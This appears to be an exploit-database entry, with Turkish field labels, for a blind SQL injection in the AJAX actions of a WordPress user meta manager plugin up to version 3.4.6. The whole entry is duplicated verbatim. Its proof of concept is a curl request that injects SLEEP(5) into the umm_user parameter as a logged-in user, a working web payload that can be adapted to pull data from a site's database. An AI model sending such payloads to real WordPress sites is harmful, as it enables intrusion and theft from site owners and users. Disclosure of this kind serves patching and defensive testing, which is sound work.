* Exploit Başlığı: WordPress User **** Manager Plugin [Blind SQLI]
* Oluşturulma Tarihi: 2015/12/28
* Exploit Çıkış Tarihi: 2016/02/04
* Açığı olan uygulama: https://wordpress.org/plugins/user-****-manager/
* Version: 3.4.6
* Test edilen sürümü : WordPress 4.4.1
* Category: webapps
Description
================================================================================
AJAX actions `umm_edit_user_****` and `umm_delete_user_****` of the User ****
Manager for WordPress plugin up to v3.4.6 are vulnerable to blind SQL injection
attacks. A registered user can pass arbitrary MySQL commands to `umm_user` GET
param.
PoC
================================================================================
curl -c ${USER_COOKIES} \
"http://${VULN_SITE}/wp-admin/admin-ajax.php\?action=umm_switch_action\
&umm_sub_action=[umm_delete_user_****|umm_edit_user_****]&umm_user=SLEEP(5)"
version 3.4.7
* Oluşturulma Tarihi: 2015/12/28
* Exploit Çıkış Tarihi: 2016/02/04
* Açığı olan uygulama: https://wordpress.org/plugins/user-****-manager/
* Version: 3.4.6
* Test edilen sürümü : WordPress 4.4.1
* Category: webapps
Description
================================================================================
AJAX actions `umm_edit_user_****` and `umm_delete_user_****` of the User ****
Manager for WordPress plugin up to v3.4.6 are vulnerable to blind SQL injection
attacks. A registered user can pass arbitrary MySQL commands to `umm_user` GET
param.
PoC
================================================================================
curl -c ${USER_COOKIES} \
"http://${VULN_SITE}/wp-admin/admin-ajax.php\?action=umm_switch_action\
&umm_sub_action=[umm_delete_user_****|umm_edit_user_****]&umm_user=SLEEP(5)"
version 3.4.7
